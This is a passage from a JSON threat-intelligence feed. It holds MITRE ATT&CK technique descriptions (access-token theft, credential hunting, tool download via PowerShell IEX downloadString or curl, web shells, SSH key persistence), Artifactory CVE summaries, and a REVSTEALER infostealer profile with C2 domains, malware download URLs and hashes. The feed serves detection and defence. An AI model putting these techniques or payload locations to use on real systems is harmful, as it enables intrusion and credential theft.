"223.144.227.110"}, {"type": "ip", "value": "129.121.56.234"}, {"type": "ip", "value": "16.54.250.190"}, {"type": "ip", "value": "105.188.75.16"}, {"type": "ip", "value": "103.124.165.42"}, {"type": "ip", "value": "176.88.121.152"}, {"type": "ip", "value": "155.254.120.23"}, {"type": "ip", "value": "220.246.124.92"}, {"type": "ip", "value": "15.157.64.113"}, {"type": "ip", "value": "104.28.251.139"}, {"type": "ip", "value": "137.184.111.69"}, {"type": "domain", "value": "log.gitclone.org"}, {"type": "url", "value": "http://log.gitclone.org:45678/smtp"}, {"type": "url", "value": "http://3.88.162.79:36789/smtp"}, {"type": "md5", "value": "ac6c52632fcf8b072be3b1c5bc076fdd"}, {"type": "sha256", "value": "6639abda5778b31cc049e4af0a71da04750fafda97d44eec3dd202d32e3e2496"}, {"type": "sha1", "value": "513a907b69edffc3cb77a494da395178d21ef9bd"}], "galaxies": [{"id": "b54f1541-3f81-46b3-87ec-cf86b974ef4c", "category": "mitre-attack-pattern", "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured \u2013 for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user\u2019s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", "created_on": "2022-01-29T06:14:22.000Z", "name": "Application Access Token"}, {"id": "33105d0b-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", "created_on": "2020-12-24T03:00:37.000Z", "name": "Credentials In Files"}, {"id": "03717eb6-d13d-430e-a68f-5646f592718a", "category": "trellix-cve-database", "description": "JFrog Artifactory (Self Hosted) versions before 7.133.11 are vulnerable to a privilege escalation attack due to a validation check of the token signature/issuer and not the token\u2019s scope.", "created_on": "2026-09-11T16:11:57.000Z", "name": "CVE-2026-42016"}, {"id": "ba4d34c1-7898-4d11-9b08-61872d24e457", "category": "trellix-cve-database", "description": "JFrog Artifactory could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.", "created_on": "2026-09-11T16:11:57.000Z", "name": "CVE-2026-42018"}, {"id": "8283932a-2bcc-4bb7-9773-7255d9ec27b8", "category": "trellix-cve-database", "description": "JFrog Artifactory contains an authentication weakness that, under default configuration, may allow an unauthenticated attacker with network access to obtain administrative privileges.", "created_on": "2026-09-11T16:11:57.000Z", "name": "CVE-2026-82329"}, {"id": "c416f2ea-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.\n\nAdversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n", "created_on": "2020-02-26T13:49:10.000Z", "name": "Data from Local System"}, {"id": "48123c3f-afc3-11eb-9d72-02d538d9640e", "category": "sector", "description": "", "created_on": "2021-05-08T06:04:42.000Z", "name": "Development"}, {"id": "c35f02b0-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.\n\nExploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).\n\nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.\n\nAdversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Exploit Public-Facing Application"}, {"id": "c3e4c145-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", "created_on": "2020-02-26T13:49:10.000Z", "name": "File and Directory Discovery"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "453a0735-6916-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-03-18T12:44:55.000Z", "name": "IT"}, {"id": "0ca0d293-5c5e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS, the <code>dscl . list /Users</code> command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)", "created_on": "2021-01-22T03:00:57.000Z", "name": "Local Account"}, {"id": "32fbe958-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. \n\nFor example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account.  In Linux, the `useradd` command can be used, while on macOS systems, the <code>dscl -create</code> command can be used. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)\n\nAdversaries may also create new local accounts on network firewall management consoles \u2013 for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.(Citation: Cyber Security News)\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", "created_on": "2020-12-24T03:00:37.000Z", "name": "Local Account"}, {"id": "37f7a0cd-a17c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code> (or, on ESXi, `/etc/ssh/keys-<username>/authorized_keys`).(Citation: SSH Authorized Keys) Users may edit the system\u2019s SSH config file to modify the directives `PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure public key and RSA authentication are enabled, as well as modify the directive `PermitRootLogin` to the value `yes` to enable root authentication via SSH.(Citation: Broadcom ESXi SSH) The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.\n\nAdversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI\u2019s \u201cadd-metadata\u201d command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.\n\nWhere authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. \n\nSSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)", "created_on": "2021-04-20T02:00:45.000Z", "name": "SSH Authorized Keys"}, {"id": "c9059ece-b232-11ea-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)  Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nFor example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container\u2019s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  \n\nSimilarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. \n\nIn Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.(Citation: Entra Managed Identities 2025)(Citation: SpecterOps Managed Identity 2022)\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  ", "created_on": "2020-06-19T13:42:57.000Z", "name": "Steal Application Access Token"}, {"id": "7ce1cfeb-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:34.000Z", "name": "Technology"}, {"id": "d65bdd8b-5bf7-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.\n\nSome systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.", "created_on": "2021-01-21T14:49:17.000Z", "name": "Unix Shell"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "3337cfef-4594-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)", "created_on": "2020-12-24T03:00:38.000Z", "name": "Web Shell"}], "metrics": [{"date": "2026-09-11", "nodes": 0.7, "events": 1.33, "sectors": [{"sector": "Various", "affected": 5.91, "events": 11.16, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 24.01, "events": 33.61, "total": 1000000}, {"iso_code": "IN", "affected": 3.33, "events": 3.33, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 15.44, "total": 1000000}, {"iso_code": "US", "affected": 0.27, "events": 1.87, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 0.62, "events": 1.48, "sectors": [{"sector": "Various", "affected": 5.25, "events": 12.48, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 24.01, "events": 38.41, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 15.44, "total": 1000000}, {"iso_code": "US", "affected": 0.53, "events": 2.67, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 1.25, "events": 1.8, "sectors": [{"sector": "Various", "affected": 10.51, "events": 15.1, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 72.02, "events": 86.42, "total": 1000000}, {"iso_code": "US", "affected": 0.27, "events": 1.34, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 1.33, "events": 2.81, "sectors": [{"sector": "Various", "affected": 11.16, "events": 23.64, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 57.61, "events": 120.03, "total": 1000000}, {"iso_code": "US", "affected": 0.8, "events": 2.14, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 10.94, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 6.72, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 1.09, "events": 2.26, "sectors": [{"sector": "Various", "affected": 9.19, "events": 19.04, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 52.81, "events": 105.62, "total": 1000000}, {"iso_code": "US", "affected": 0.53, "events": 1.34, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 6.72, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 0.47, "events": 0.62, "sectors": [{"sector": "Various", "affected": 750000, "events": 1000000, "total": 1000000}], "countries": [{"iso_code": "TR", "affected": 28.81, "events": 38.41, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "36503a99-1442-4221-bb3e-721576ff484b", "threat_level_id": 2, "description": "REVSTEALER is a commercially distributed infostealer first observed in February 2026, targeting gaming platforms, browser credentials, and cryptocurrency wallets for financial gain through credential theft and data exfiltration. The malware employs extensive anti-analysis techniques including control-flow flattening, string encryption, API hashing, and a 10-check sandbox scoring system that terminates execution if the score reaches 7 or higher. It implements exclusion checks for CIS-region locales and requires a six-character verification PIN if an unpacked watermarked sample is executed. Once established, REVSTEALER collects system information, browser credentials (bypassing Chrome's Application-Bound Encryption via debugger-based extraction), cryptocurrency wallets, gaming platform data, messaging applications, password managers, VPN configurations, and generic sensitive files. Data is encrypted using AES-128-CBC and exfiltrated via HTTPS to operator-controlled infrastructure, with C2 endpoints retrieved from encrypted embedded configurations or Polygon blockchain contracts. Four auxiliary modules extend capabilities into interactive wallet theft (ProManager), clipboard cryptocurrency address swapping (WinUpdate), reverse SOCKS5 proxy access (SoftManager), and privileged XMRig mining with defensive-system tampering (LockAppHost).\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Elastic Security Labs and shared publicly https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9cd59668ba5a104d/6a97978bd04dac6f166ca8ce/REVSTEALER_-_White_paper.pdf", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9cd59668ba5a104d/6a97978bd04dac6f166ca8ce/REVSTEALER_-_White_paper.pdf", "https://www.elastic.co/security-labs/threat-command/revstealer-credential-harvesting-infostealer#observables-and-indicators-of-compromise"]}, "is_coat": 0, "name": "RevStealer Ramps Up Emerging Infostealer Targeting Gamers", "prevalence": {"countries": [{"iso_code": "US", "affected": 40.12, "events": 173.05, "total": 1000000}, {"iso_code": "IT", "affected": 594.67, "events": 1622.75, "total": 1000000}, {"iso_code": "FR", "affected": 87.59, "events": 210.86, "total": 1000000}, {"iso_code": "CZ", "affected": 363.34, "events": 484.46, "total": 1000000}, {"iso_code": "PL", "affected": 280.42, "events": 578.94, "total": 1000000}, {"iso_code": "AT", "affected": 207.85, "events": 350.06, "total": 1000000}, {"iso_code": "DE", "affected": 23.35, "events": 39.43, "total": 1000000}, {"iso_code": "GB", "affected": 89.42, "events": 161.54, "total": 1000000}, {"iso_code": "ES", "affected": 103.29, "events": 222.89, "total": 1000000}, {"iso_code": "TW", "affected": 457.67, "events": 915.33, "total": 1000000}, {"iso_code": "TR", "affected": 86.42, "events": 259.26, "total": 1000000}, {"iso_code": "CH", "affected": 172.27, "events": 466.15, "total": 1000000}, {"iso_code": "VN", "affected": 47.42, "events": 94.84, "total": 1000000}, {"iso_code": "TH", "affected": 161.98, "events": 307.76, "total": 1000000}, {"iso_code": "GR", "affected": 864.64, "events": 2017.48, "total": 1000000}, {"iso_code": "GT", "affected": 1613.65, "events": 1613.65, "total": 1000000}, {"iso_code": "SE", "affected": 68.08, "events": 447.41, "total": 1000000}, {"iso_code": "HU", "affected": 199.65, "events": 898.44, "total": 1000000}, {"iso_code": "SK", "affected": 931.72, "events": 2528.95, "total": 1000000}, {"iso_code": "BE", "affected": 94.22, "events": 141.33, "total": 1000000}, {"iso_code": "IN", "affected": 8.33, "events": 10, "total": 1000000}, {"iso_code": "NG", "affected": 281.74, "events": 281.74, "total": 1000000}, {"iso_code": "BR", "affected": 14, "events": 14, "total": 1000000}, {"iso_code": "CO", "affected": 119.77, "events": 259.49, "total": 1000000}, {"iso_code": "NL", "affected": 32.33, "events": 32.33, "total": 1000000}, {"iso_code": "SV", "affected": 638.57, "events": 798.21, "total": 1000000}, {"iso_code": "CA", "affected": 11.29, "events": 30.11, "total": 1000000}, {"iso_code": "SG", "affected": 19.33, "events": 19.33, "total": 1000000}, {"iso_code": "DK", "affected": 133.33, "events": 222.22, "total": 1000000}, {"iso_code": "FI", "affected": 38.3, "events": 38.3, "total": 1000000}, {"iso_code": "ID", "affected": 23.47, "events": 46.93, "total": 1000000}, {"iso_code": "KR", "affected": 120.98, "events": 786.35, "total": 1000000}, {"iso_code": "NO", "affected": 553.71, "events": 1291.99, "total": 1000000}, {"iso_code": "SA", "affected": 18.54, "events": 18.54, "total": 1000000}, {"iso_code": "CN", "affected": 3.23, "events": 6.46, "total": 1000000}, {"iso_code": "DO", "affected": 34.71, "events": 34.71, "total": 1000000}, {"iso_code": "HR", "affected": 62.52, "events": 125.05, "total": 1000000}, {"iso_code": "KZ", "affected": 96.04, "events": 96.04, "total": 1000000}, {"iso_code": "LB", "affected": 264.62, "events": 264.62, "total": 1000000}, {"iso_code": "PH", "affected": 25.85, "events": 25.85, "total": 1000000}, {"iso_code": "PT", "affected": 51.45, "events": 102.89, "total": 1000000}], "events": 157.81, "nodes": 58.72, "sectors": [{"sector": "Unknown", "affected": 489.18, "events": 1311.92, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 375000, "events": 1250000, "total": 1000000}, {"sector": "Government", "affected": 1.23, "events": 4.93, "total": 1000000}, {"sector": "Education", "affected": 3.05, "events": 3.05, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip", "value": "192.162.199.246"}, {"type": "domain", "value": "monitor5.roast-core85.click"}, {"type": "domain", "value": "config.hubdisplay.lol"}, {"type": "domain", "value": "health.journal-metric.lol"}, {"type": "domain", "value": "metric.gardenpark.click"}, {"type": "domain", "value": "pool.supportxmr.com"}, {"type": "domain", "value": "polygon-bor-rpc.publicnode.com"}, {"type": "domain", "value": "poly.api.pocket.network"}, {"type": "domain", "value": "polygon.lava.build"}, {"type": "domain", "value": "polygon-public.nodies.app"}, {"type": "domain", "value": "polygon.drpc.org"}, {"type": "domain", "value": "polygon.rpc.subquery.network"}, {"type": "domain", "value": "polygon.api.onfinality.io"}, {"type": "domain", "value": "rpc.sentio.xyz"}, {"type": "domain", "value": "polygon.gateway.tenderly.co"}, {"type": "domain", "value": "api.zan.top"}, {"type": "url", "value": "http://monitor5.roast-core85.click/ext/status"}, {"type": "url", "value": "https://config.hubdisplay.lol/1/8f21c4a7"}, {"type": "url", "value": "http://192.162.199.246/pb7U1zhaae3xpSNrEvJH5yqqyMyTbnNF/9z7BGnRGpgs8cZv7.exe"}, {"type": "url", "value": "http://192.162.199.246/pb7U1zhaae3xpSNrEvJH5yqqyMyTbnNF/gM9anp0uZNKX8zHj.exe"}, {"type": "url", "value": "http://192.162.199.246/pb7U1zhaae3xpSNrEvJH5yqqyMyTbnNF/6eq5gv0fRvNnCi54.exe"}, {"type": "url", "value": "http://192.162.199.246/pb7U1zhaae3xpSNrEvJH5yqqyMyTbnNF/mkM65Cf6QNqe0Vw9.exe"}, {"type": "url", "value": "https://www.elastic.co/security-labs/threat-command/revstealer-credential-harvesting-infostealer"}, {"type": "url", "value": "https://bazaar.abuse.ch/browse/signature/REVSTEALER/"}, {"type": "url", "value": "https://x.com/GenThreatLabs/status/2082811429401272495"}, {"type": "md5", "value": "1cfdd65fa43a819bfce1f7f322565098"}, {"type": "sha1", "value": "5aca97cc7a6f253ffc9e3738353c236363835529"}, {"type": "sha256", "value": "adc4aa652965396b52e79435ca54987ae9eb21bf5e67de5e9461b09655165ee4"}, {"type": "md5", "value": "73650b24e045a4636ffba752fdb5b743"}, {"type": "sha256", "value": "7c08cf409194056a8517865e5d3433d1499bb8262263b55b49b8b07d9d182fcb"}, {"type": "sha1", "value": "8a3d4f66cd8522f96fecb02870c1da59fd4968ce"}, {"type": "md5", "value": "0187bf1ef6341b0eb52e2dc0a1fef693"}, {"type": "sha256", "value": "13d7237d7289e67c2d806a65d52580b453ce4987acbe2c4c4d04833f55ebccfa"}, {"type": "sha1", "value": "cbb414de10499565a6eef28c24f75bb5128acadc"}, {"type": "md5", "value": "5f8430227835881d5451bb0c083c2401"}, {"type": "sha1", "value": "52c921a7cea0d0471cfe61291a6c69345c2cde64"}, {"type": "sha256", "value": "c66d2b77b9e85c53391891212413ad9a99eb66f4b11c6a431e78884a5b2651e5"}, {"type": "md5", "value": "b6cc70224c5d75c4705c919dfe2048ea"}, {"type": "sha256", "value": 